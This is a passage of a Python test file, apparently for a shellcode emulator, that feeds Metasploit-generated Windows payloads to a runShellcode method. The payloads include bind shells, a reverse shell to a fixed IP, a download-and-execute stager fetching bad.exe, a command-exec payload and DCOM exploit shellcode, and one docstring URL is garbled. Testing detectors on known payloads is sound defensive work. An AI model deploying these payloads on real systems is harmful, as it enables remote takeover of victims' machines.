Size=709 Encoder=PexAlphaNum http://metasploit.com 141 | """ 142 | 143 | shellcode = b"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" 144 | shellcode += b"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" 145 | shellcode += b"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" 146 | shellcode += b"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" 147 | shellcode += b"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" 148 | shellcode += b"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48" 149 | shellcode += b"\x4e\x46\x46\x52\x46\x52\x4b\x38\x45\x54\x4e\x33\x4b\x38\x4e\x47" 150 | shellcode += b"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x51\x4b\x38" 151 | shellcode += b"\x4f\x45\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x43\x4b\x58" 152 | shellcode += b"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" 153 | shellcode += b"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e" 154 | shellcode += b"\x46\x4f\x4b\x33\x46\x45\x46\x52\x4a\x42\x45\x47\x45\x4e\x4b\x48" 155 | shellcode += b"\x4f\x55\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34" 156 | shellcode += b"\x4b\x48\x4f\x35\x4e\x41\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x38" 157 | shellcode += b"\x49\x58\x4e\x36\x46\x32\x4e\x31\x41\x36\x43\x4c\x41\x33\x4b\x4d" 158 | shellcode += b"\x46\x56\x4b\x38\x43\x54\x42\x33\x4b\x48\x42\x34\x4e\x30\x4b\x58" 159 | shellcode += b"\x42\x57\x4e\x41\x4d\x4a\x4b\x38\x42\x54\x4a\x30\x50\x55\x4a\x46" 160 | shellcode += b"\x50\x48\x50\x54\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x56" 161 | shellcode += b"\x43\x55\x48\x46\x4a\x46\x43\x33\x44\x43\x4a\x46\x47\x57\x43\x57" 162 | shellcode += b"\x44\x53\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e" 163 | shellcode += b"\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x45\x49\x48\x45\x4e" 164 | shellcode += b"\x48\x36\x41\x58\x4d\x4e\x4a\x30\x44\x50\x45\x55\x4c\x56\x44\x30" 165 | shellcode += 
b"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x45" 166 | shellcode += b"\x4f\x4f\x48\x4d\x43\x35\x43\x55\x43\x35\x43\x45\x43\x35\x43\x54" 167 | shellcode += b"\x43\x45\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x46\x4a\x46\x41\x51" 168 | shellcode += b"\x4e\x35\x48\x36\x43\x35\x49\x58\x41\x4e\x45\x49\x4a\x36\x46\x4a" 169 | shellcode += b"\x4c\x41\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x41" 170 | shellcode += b"\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x52" 171 | shellcode += b"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x35\x45\x45\x4f\x4f\x42\x4d" 172 | shellcode += b"\x4a\x56\x45\x4e\x49\x44\x48\x58\x49\x34\x47\x45\x4f\x4f\x48\x4d" 173 | shellcode += b"\x42\x55\x46\x35\x46\x55\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x46" 174 | shellcode += b"\x47\x4e\x49\x37\x48\x4c\x49\x47\x47\x35\x4f\x4f\x48\x4d\x45\x45" 175 | shellcode += b"\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x46\x48\x46\x4a\x56\x43\x46" 176 | shellcode += b"\x4d\x56\x49\x48\x45\x4e\x4c\x36\x42\x55\x49\x45\x49\x42\x4e\x4c" 177 | shellcode += b"\x49\x38\x47\x4e\x4c\x46\x46\x54\x49\x38\x44\x4e\x41\x43\x42\x4c" 178 | shellcode += b"\x43\x4f\x4c\x4a\x50\x4f\x44\x44\x4d\x42\x50\x4f\x44\x34\x4e\x52" 179 | shellcode += b"\x43\x39\x4d\x48\x4c\x37\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56" 180 | shellcode += b"\x44\x37\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x37\x46\x34\x4f\x4f" 181 | shellcode += b"\x48\x4d\x4b\x55\x47\x55\x44\x55\x41\x45\x41\x55\x41\x45\x4c\x56" 182 | shellcode += b"\x41\x50\x41\x35\x41\x55\x45\x55\x41\x55\x4f\x4f\x42\x4d\x4a\x56" 183 | shellcode += b"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36" 184 | shellcode += b"\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x48\x47\x45\x4e\x4f" 185 | shellcode += b"\x43\x38\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d" 186 | shellcode += b"\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x43\x35\x4f\x4f\x48\x4d" 187 | shellcode += b"\x4f\x4f\x42\x4d\x5a" 188 | 189 | self.runShellcode(shellcode, 3) 190 | 191 | def 
testShellcode4(self): 192 | """ 193 | win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com 194 | """ 195 | 196 | shellcode = b"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x02" 197 | shellcode += b"\x19\x61\x76\x83\xeb\xfc\xe2\xf4\xfe\x73\x8a\x3b\xea\xe0\x9e\x89" 198 | shellcode += b"\xfd\x79\xea\x1a\x26\x3d\xea\x33\x3e\x92\x1d\x73\x7a\x18\x8e\xfd" 199 | shellcode += b"\x4d\x01\xea\x29\x22\x18\x8a\x3f\x89\x2d\xea\x77\xec\x28\xa1\xef" 200 | shellcode += b"\xae\x9d\xa1\x02\x05\xd8\xab\x7b\x03\xdb\x8a\x82\x39\x4d\x45\x5e" 201 | shellcode += b"\x77\xfc\xea\x29\x26\x18\x8a\x10\x89\x15\x2a\xfd\x5d\x05\x60\x9d" 202 | shellcode += b"\x01\x35\xea\xff\x6e\x3d\x7d\x17\xc1\x28\xba\x12\x89\x5a\x51\xfd" 203 | shellcode += b"\x42\x15\xea\x06\x1e\xb4\xea\x36\x0a\x47\x09\xf8\x4c\x17\x8d\x26" 204 | shellcode += b"\xfd\xcf\x07\x25\x64\x71\x52\x44\x6a\x6e\x12\x44\x5d\x4d\x9e\xa6" 205 | shellcode += b"\x6a\xd2\x8c\x8a\x39\x49\x9e\xa0\x5d\x90\x84\x10\x83\xf4\x69\x74" 206 | shellcode += b"\x57\x73\x63\x89\xd2\x71\xb8\x7f\xf7\xb4\x36\x89\xd4\x4a\x32\x25" 207 | shellcode += b"\x51\x4a\x22\x25\x41\x4a\x9e\xa6\x64\x71\x70\x2a\x64\x4a\xe8\x97" 208 | shellcode += b"\x97\x71\xc5\x6c\x72\xde\x36\x89\xd4\x73\x71\x27\x57\xe6\xb1\x1e" 209 | shellcode += b"\xa6\xb4\x4f\x9f\x55\xe6\xb7\x25\x57\xe6\xb1\x1e\xe7\x50\xe7\x3f" 210 | shellcode += b"\x55\xe6\xb7\x26\x56\x4d\x34\x89\xd2\x8a\x09\x91\x7b\xdf\x18\x21" 211 | shellcode += b"\xfd\xcf\x34\x89\xd2\x7f\x0b\x12\x64\x71\x02\x1b\x8b\xfc\x0b\x26" 212 | shellcode += b"\x5b\x30\xad\xff\xe5\x73\x25\xff\xe0\x28\xa1\x85\xa8\xe7\x23\x5b" 213 | shellcode += b"\xfc\x5b\x4d\xe5\x8f\x63\x59\xdd\xa9\xb2\x09\x04\xfc\xaa\x77\x89" 214 | shellcode += b"\x77\x5d\x9e\xa0\x59\x4e\x33\x27\x53\x48\x0b\x77\x53\x48\x34\x27" 215 | shellcode += b"\xfd\xc9\x09\xdb\xdb\x1c\xaf\x25\xfd\xcf\x0b\x89\xfd\x2e\x9e\xa6" 216 | shellcode += b"\x89\x4e\x9d\xf5\xc6\x7d\x9e\xa0\x50\xe6\xb1\x1e\xf2\x93\x65\x29" 217 | shellcode += 
b"\x51\xe6\xb7\x89\xd2\x19\x61\x76" 218 | 219 | self.runShellcode(shellcode, 4) 220 | 221 | def testShellcode5(self): 222 | """ 223 | win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=ShikataGaNai http://metasploit.com 224 | """ 225 | 226 | shellcode = b"\x31\xc9\xdd\xc1\xd9\x74\x24\xf4\xbb\xbe\x78\x0e\x3a\xb1\x51\x5e" 227 | shellcode += b"\x83\xc6\x04\x31\x5e\x11\x03\xe0\x69\xec\xcf\xe0\xe0\x1b\x62\xf0" 228 | shellcode += b"\x0c\x24\x82\xff\x8f\x50\x11\xdb\x6b\xec\xaf\x1f\xff\x8e\x2a\x27" 229 | shellcode += b"\xfe\x81\xbe\x98\x18\xd5\x9e\x06\x18\x02\x69\xcd\x2e\x5f\x6b\x3f" 230 | shellcode += b"\x7f\x9f\xf5\x13\x04\xdf\x72\x6c\xc4\x2a\x77\x73\x04\x41\x7c\x48" 231 | shellcode += b"\xdc\xb2\x55\xdb\x39\x31\xfa\x07\xc3\xad\x63\xcc\xcf\x7a\xe7\x8d" 232 | shellcode += b"\xd3\x7d\x1c\x32\xc0\xf6\x6b\x58\x3c\x15\x0d\x63\x0d\xfe\xa9\xe8" 233 | shellcode += b"\x2d\x30\xb9\xae\xbd\xbb\xcd\x32\x13\x30\x6d\x42\x35\x2f\xe0\x1c" 234 | shellcode += b"\xc7\x43\xac\x5f\x01\xfd\x1e\xf9\xc6\x31\x93\x6d\x60\x45\xe1\x32" 235 | shellcode += b"\xda\x56\xd5\xa4\x29\x45\x2a\x0f\xfe\x69\x05\x30\x77\x70\xcc\x4f" 236 | shellcode += b"\x6a\x73\x13\x1a\x1f\x86\xec\x74\xb7\x5f\x1b\x81\xe5\x37\xe3\xbf" 237 | shellcode += b"\xa5\xe4\x48\x6c\x19\x48\x3c\xd1\xce\xb1\x12\xb3\x98\x5c\xcf\x5d" 238 | shellcode += b"\x0a\xd6\x0e\x34\xc4\x4c\xca\x46\xd2\xda\x14\x70\xb6\xf4\xbb\x29" 239 | shellcode += b"\xb8\x25\x53\x75\xeb\xe8\x4d\x22\x0b\x22\xde\x99\x0c\x1b\x89\xc4" 240 | shellcode += b"\xba\x1a\x03\x51\xc2\xf5\xc4\x09\x68\xaf\x1b\x61\x03\x27\x03\xf8" 241 | shellcode += b"\xe2\xc1\x9c\x05\x3c\x64\xdc\x29\xa7\xed\x46\xaf\x40\x91\xeb\xa6" 242 | shellcode += b"\x74\x3f\xa4\xe1\x5f\x0c\xcd\xf6\xca\xc8\x47\x1a\x3b\x11\xa4\x70" 243 | shellcode += b"\xc2\xd3\x66\x7a\x79\xf8\xeb\x0f\x04\x38\xa7\xa4\x52\x50\xc5\x44" 244 | shellcode += b"\x17\xb7\xd6\xcd\x1c\x47\xfe\x76\xca\xe5\xae\xd9\xa5\x63\x50\x88" 245 | shellcode += b"\x14\x21\x03\xd5\x47\xa1\x0e\xf0\x6d\xfc\x02\xfd\xb8\x6a\x5a\xfe" 246 | shellcode += 
b"\x72\x94\x74\x8b\x2a\x96\xf6\x4f\xb0\x99\x2f\x1d\xc6\xb6\xb8\x51" 247 | shellcode += b"\xb2\x33\x66\xc2\x3c\xed\x67\x34" 248 | 249 | self.runShellcode(shellcode, 5) 250 | 251 | def testShellcode6(self): 252 | """ 253 | win32_bind - EXITFUNC=seh LPORT=4444 Size=349 Encoder=JmpCallAdditive http://metasploit.com 254 | """ 255 | 256 | shellcode = b"\xfc\xbb\x1e\x88\xb8\x04\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85" 257 | shellcode += b"\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\xe2\xe2\x53\x49\xf2\x0a\x5c" 258 | shellcode += b"\xad\xfd\x8d\x28\x3e\x25\x6a\xa4\xfa\x19\xf9\xc6\x01\x19\xfc\xd9" 259 | shellcode += b"\x81\x96\xe6\xae\xc9\x08\x16\x5a\xbc\xc3\x2c\x17\x3e\x3d\x7d\xe7" 260 | shellcode += b"\xd8\x6d\xfa\x27\xae\x6a\xc2\x62\x42\x75\x06\x99\xa9\x4e\xd2\x7a" 261 | shellcode += b"\x7a\xc5\x3f\x09\x25\x01\xc1\xe5\xbc\xc2\xcd\xb2\xcb\x8b\xd1\x45" 262 | shellcode += b"\x27\x30\xc6\xce\x3e\x5a\x32\xcd\x21\x61\x0b\x36\xc5\xee\x2f\xf8" 263 | shellcode += b"\x8d\xb0\xa3\x73\xe1\x2c\x11\x08\x42\x44\x37\x67\xcd\x1a\xc9\x9b" 264 | shellcode += b"\x81\x5d\x03\x05\x71\xc7\xc4\xf9\x47\x6f\x62\x8d\x95\x30\xd8\x8e" 265 | shellcode += b"\x0a\xa6\x2b\x9d\x57\x0d\xfc\xa1\x7e\x2e\x75\xb8\x19\x51\x68\x4b" 266 | shellcode += b"\xe4\x04\x19\x4e\x17\x76\xb5\x97\xee\x83\xeb\x7f\x0e\xbd\xa7\x2c" 267 | shellcode += b"\xa3\x12\x1b\x90\x10\xd7\xc8\xe9\x47\xb1\x86\x04\x34\x5b\x04\xae" 268 | shellcode += b"\x25\x36\xc2\x14\xbf\x48\xd4\x02\x3f\x7e\xb0\xbc\xee\x2b\xba\x6d" 269 | shellcode += b"\x78\x77\xe9\xa0\x90\x20\x0d\x6a\x31\x9b\x0e\x43\xde\xc6\xb8\xe2" 270 | shellcode += b"\x56\x5f\xc4\x3d\x38\x0b\x6e\x97\x46\x63\x1d\x7f\x5e\xfa\xe4\xf9" 271 | shellcode += b"\xf7\x03\x3e\xac\x08\x2b\xd9\x25\x93\xad\x4e\xd9\x36\xb8\x6a\x77" 272 | shellcode += b"\x99\xe3\x5d\x44\x90\xf4\xf4\x10\x2a\x18\x39\x59\xdf\x76\xc4\x1b" 273 | shellcode += b"\x0d\x78\x7b\xb0\xde\x09\x06\xf0\x4b\xba\x5c\x68\xfe\x42\x11\x7f" 274 | shellcode += b"\x01\xcf\x12\x7f\x2b\x74\xcc\x2d\x85\xdb\xa3\xbb\x24\x8a\x12\x69" 275 | shellcode += 
b"\x76\xd3\x45\xf9\xd5\xf2\x63\x34\x76\xfb\xba\xa2\x86\xfc\x74\xcc" 276 | shellcode += b"\xa9\x89\x2c\xce\xc9\x49\xb6\xd1\x18\x03\xc8\xfe\xcd\x53\xbc\xfb" 277 | shellcode += b"\x52\xc0\x3e\xd5\x92\x36\xc0\xda\x6c\xb6\xc1\xda\x6c" 278 | 279 | self.runShellcode(shellcode, 6) 280 | 281 | def testShellcode7(self): 282 | """ 283 | win32_reverse - EXITFUNC=seh LHOST=216.75.15.231 LPORT=4321 Size=287 Encoder=None http://metasploit.com 284 | """ 285 | 286 | shellcode = b"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45" 287 | shellcode += b"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49" 288 | shellcode += b"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" 289 | shellcode += b"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66" 290 | shellcode += b"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61" 291 | shellcode += b"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" 292 | shellcode += b"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" 293 | shellcode += b"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6" 294 | shellcode += b"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" 295 | shellcode += b"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68" 296 | shellcode += b"\xd8\x4b\x0f\xe7\x66\x68\x10\xe1\x66\x53\x89\xe1\x95\x68\xec\xf9" 297 | shellcode += b"\xaa\x60\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68" 298 | shellcode += b"\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3" 299 | shellcode += b"\xaa\x95\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab" 300 | shellcode += b"\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51" 301 | shellcode += b"\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff\xd6" 302 | shellcode += b"\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04\xff\xd6" 303 | shellcode += 
b"\xff\x77\xfc\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0" 304 | 305 | self.runShellcode(shellcode, 7) 306 | 307 | def testShellcode8(self): 308 | """ 309 | win32_downloadexec - URL=http://nepenthes.mwcollect.org/bad.exe Size=378 Encoder=None http://metasploit.ndings.pyx.swpcom 310 | """ 311 | 312 | shellcode = b"\xeb\x10\x5a\x4a\x33\xc9\x66\xb9\x3c\x01\x80\x34\x0a\x99\xe2\xfa" 313 | shellcode += b"\xeb\x05\xe8\xeb\xff\xff\xff\x70\x4c\x99\x99\x99\xc3\xfd\x38\xa9" 314 | shellcode += b"\x99\x99\x99\x12\xd9\x95\x12\xe9\x85\x34\x12\xd9\x91\x12\x41\x12" 315 | shellcode += b"\xea\xa5\x12\xed\x87\xe1\x9a\x6a\x12\xe7\xb9\x9a\x62\x12\xd7\x8d" 316 | shellcode += b"\xaa\x74\xcf\xce\xc8\x12\xa6\x9a\x62\x12\x6b\xf3\x97\xc0\x6a\x3f" 317 | shellcode += b"\xed\x91\xc0\xc6\x1a\x5e\x9d\xdc\x7b\x70\xc0\xc6\xc7\x12\x54\x12" 318 | shellcode += b"\xdf\xbd\x9a\x5a\x48\x78\x9a\x58\xaa\x50\xff\x12\x91\x12\xdf\x85" 319 | shellcode += b"\x9a\x5a\x58\x78\x9b\x9a\x58\x12\x99\x9a\x5a\x12\x63\x12\x6e\x1a" 320 | shellcode += b"\x5f\x97\x12\x49\xf3\x9d\xc0\x71\xc9\x99\x99\x99\x1a\x5f\x94\xcb" 321 | shellcode += b"\xcf\x66\xce\x65\xc3\x12\x41\xf3\x98\xc0\x71\xa4\x99\x99\x99\x1a" 322 | shellcode += b"\x5f\x8a\xcf\xdf\x19\xa7\x19\xec\x63\x19\xaf\x19\xc7\x1a\x75\xb9" 323 | shellcode += b"\x12\x45\xf3\xb9\xca\x66\xce\x75\x5e\x9d\x9a\xc5\xf8\xb7\xfc\x5e" 324 | shellcode += b"\xdd\x9a\x9d\xe1\xfc\x99\x99\xaa\x59\xc9\xc9\xca\xcf\xc9\x66\xce" 325 | shellcode += b"\x65\x12\x45\xc9\xca\x66\xce\x69\xc9\x66\xce\x6d\xaa\x59\x35\x1c" 326 | shellcode += b"\x59\xec\x60\xc8\xcb\xcf\xca\x66\x4b\xc3\xc0\x32\x7b\x77\xaa\x59" 327 | shellcode += b"\x5a\x71\xbf\x66\x66\x66\xde\xfc\xed\xc9\xeb\xf6\xfa\xd8\xfd\xfd" 328 | shellcode += b"\xeb\xfc\xea\xea\x99\xde\xfc\xed\xca\xe0\xea\xed\xfc\xf4\xdd\xf0" 329 | shellcode += b"\xeb\xfc\xfa\xed\xf6\xeb\xe0\xd8\x99\xce\xf0\xf7\xdc\xe1\xfc\xfa" 330 | shellcode += b"\x99\xdc\xe1\xf0\xed\xcd\xf1\xeb\xfc\xf8\xfd\x99\xd5\xf6\xf8\xfd" 331 | shellcode += 
b"\xd5\xf0\xfb\xeb\xf8\xeb\xe0\xd8\x99\xec\xeb\xf5\xf4\xf6\xf7\x99" 332 | shellcode += b"\xcc\xcb\xd5\xdd\xf6\xee\xf7\xf5\xf6\xf8\xfd\xcd\xf6\xdf\xf0\xf5" 333 | shellcode += b"\xfc\xd8\x99\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x65\x70\x65\x6e\x74" 334 | shellcode += b"\x68\x65\x73\x2e\x6d\x77\x63\x6f\x6c\x6c\x65\x63\x74\x2e\x6f\x72" 335 | shellcode += b"\x67\x2f\x62\x61\x64\x2e\x65\x78\x65\x80" 336 | 337 | self.runShellcode(shellcode, 8) 338 | 339 | def testShellcode9(self): 340 | """ 341 | win32_exec - EXITFUNC=seh CMD=cmd -c ftp.exe -s foo.scripted_sequence; echo der 342 | fox hat die gans gezogen Size=205 Encoder=None http://metasploit.com 343 | """ 344 | 345 | shellcode = b"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" 346 | shellcode += b"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99" 347 | shellcode += b"\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04" 348 | shellcode += b"\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" 349 | shellcode += b"\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x31\xc0\x64\x8b\x40\x30" 350 | shellcode += b"\x85\xc0\x78\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\xeb\x09" 351 | shellcode += b"\x8b\x80\xb0\x00\x00\x00\x8b\x68\x3c\x5f\x31\xf6\x60\x56\x89\xf8" 352 | shellcode += b"\x83\xc0\x7b\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff" 353 | shellcode += b"\xe7\x63\x6d\x64\x20\x2d\x63\x20\x66\x74\x70\x2e\x65\x78\x65\x20" 354 | shellcode += b"\x2d\x73\x20\x66\x6f\x6f\x2e\x73\x63\x72\x69\x70\x74\x65\x64\x5f" 355 | shellcode += b"\x73\x65\x71\x75\x65\x6e\x63\x65\x3b\x20\x65\x63\x68\x6f\x20\x64" 356 | shellcode += b"\x65\x72\x20\x66\x6f\x78\x20\x68\x61\x74\x20\x64\x69\x65\x20\x67" 357 | shellcode += b"\x61\x6e\x73\x20\x67\x65\x7a\x6f\x67\x65\x6e\x20\x00" 358 | 359 | self.runShellcode(shellcode, 9) 360 | 361 | def testShellcode10(self): 362 | """ 363 | Some old DCOM code 364 | """ 365 | 366 | shellcode = b"\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff\xff\xff\x81\x36\x80\xbf\x32" 
# 0x0090 ..^1.... ....6..2" 367 | shellcode += b"\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff" # 0x00a0 ........ ........" 368 | shellcode += b"\x03\x53\x06\x1f\x74\x57\x75\x95\x80\xbf\xbb\x92\x7f\x89\x5a\x1a" # 0x00b0 .S..tWu. ......Z." 369 | shellcode += b"\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09\xf9\x3a\x6b\xb6\xd7\x9f\x4d" # 0x00c0 ...|..2. ..:k...M" 370 | shellcode += b"\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6\xb3\x5a\xf8\xec\xbf\x32\xfc" # 0x00d0 .q....2. ..Z...2." 371 | shellcode += b"\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf\xeb\xcd\xc2\x88\x36\x74\x90" # 0x00e0 ......A. .....6t." 372 | shellcode += b"\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad\xbe\x32\x94\x09\xf9\x22\x6b" # 0x00f0 ..Z.~.$| ..2..."k" 373 | shellcode += b"\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81\xbf\x32\x1d\xc6\xab\xcd\xe2" # 0x0100 ..LLb... ..2....." 374 | shellcode += b"\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81\xbf\x32\x1d\xc6\xa7\xcd\xe2" # 0x0110 ...y|... ..2....." 375 | shellcode += b"\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80\xbf\x32\x1d\xc6\xa3\xcd\xe2" # 0x0120 ....u..j ..2....." 376 | shellcode += b"\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80\xbf\x32\x1d\xc6\x9f\xcd\xe2" # 0x0130 .....x.z ..2....." 377 | shellcode += b"\x84\xd7\x96\x39\xae\x56\xda\x4a\x80\xbf\x32\x1d\xc6\x9b\xcd\xe2" # 0x0140 ...9.V.J ..2....." 378 | shellcode += b"\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80\xbf\x32\x1d\xc6\x97\xcd\xe2" # 0x0150 .......Z ..2....." 379 | shellcode += b"\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80\xbf\x32\x1d\xc6\x93\x01\x6b" # 0x0160 ....F..* ..2....k" 380 | shellcode += b"\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81\xbe\x32\x94\x7f\xe9\x2a\xc4" # 0x0170 .S....f. ..2...*." 381 | shellcode += b"\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6\xa3\xb9\x4c\xd7\xe8\x5a\x96" # 0x0180 ..b...bk ...L..Z." 382 | shellcode += b"\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3\x40\x64\xb4\xd7\xec\xcd\xc2" # 0x0190 ..n.L.$. .@d....." 383 | shellcode += b"\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50\xd7\x57\xec\xe5\xbf\x5a\xf7" # 0x01a0 ..c..... P.W...Z." 
384 | shellcode += b"\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4\x32\x0e\xb0\xb3\x7f\x01\x5d" # 0x01b0 .......x .2.....]" 385 | shellcode += b"\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4\xaf\x76\x6a\xc4\x9b\x0f\x1d" # 0x01c0 .~'?bB.. ..vj...." 386 | shellcode += b"\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4\x9b\x62\x19\xc4\x9b\x22\xc0" # 0x01d0 ..z...~. ..b..."." 387 | shellcode += b"\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f\xc9\x02\xc5\x7f\xe9\x22\x1f" # 0x01e0 ..c...c. ......"." 388 | shellcode += b"\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b\x77\x65\x6b\xd6\x93\xcd\xc2" # 0x01f0 L..k.@d. .wek...." 389 | shellcode += b"\x94\xea\x64\xf0\x21\x8f\x32\x94\x80\x3a\xf2\xec\x8c\x34\x72\x98" # 0x0200 ..d.!.2. .:...4r." 390 | shellcode += b"\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89\x34\x72\xa0\x0b\x17\x8a\x94" # 0x0210 ...9..:. .4r....." 391 | shellcode += b"\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80\xec\x67\xc2\xd7\x34\x5e\xb0" # 0x0220 ...Q.... ..g..4^." 392 | shellcode += b"\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83\x6a\xb9\xde\x98\x34\x68\xb4" # 0x0230 .4w...7. .j...4h." 393 | shellcode += b"\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83\x4a\x01\x6b\x7c\x8c\xf2\x38" # 0x0240 .b...4.. .J.k|..8" 394 | shellcode += b"\xba\x7b\x46\x93\x41\x70\x3f\x97\x78\x54\xc0\xaf\xfc\x9b\x26\xe1" # 0x0250 .{F.Ap?. xT....&." 395 | shellcode += b"\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c\xf4\xb9\xce\x9c\xbc\xef\x1f" # 0x0260 a4h..bT. ........" 396 | shellcode += b"\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b\x6a\x6d\xca\xdd\xe4\xf0\x90" # 0x0270 .41Qk..T .jm....." 397 | shellcode += b"\x80\x2f\xa2\x04\x00\x5c\x00\x43\x00\x24\x00\x5c\x00\x31\x00\x32" # 0x0280 ./...\.C .$.\.1.2" 398 | shellcode += b"\x00\x33\x00\x34\x00\x35\x00\x36\x00\x31\x00\x31\x00\x31\x00\x31" # 0x0290 .3.4.5.6 .1.1.1.1" 399 | shellcode += b"\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31" # 0x02a0 .1.1.1.1 .1.1.1.1" 400 | shellcode += b"\x00\x31\x00\x31\x00\x31\x00\x2e\x00\x64\x00\x6f\x00\x63\x00\x00" # 0x02b0 .1.1.1.. .d.o.c.." 
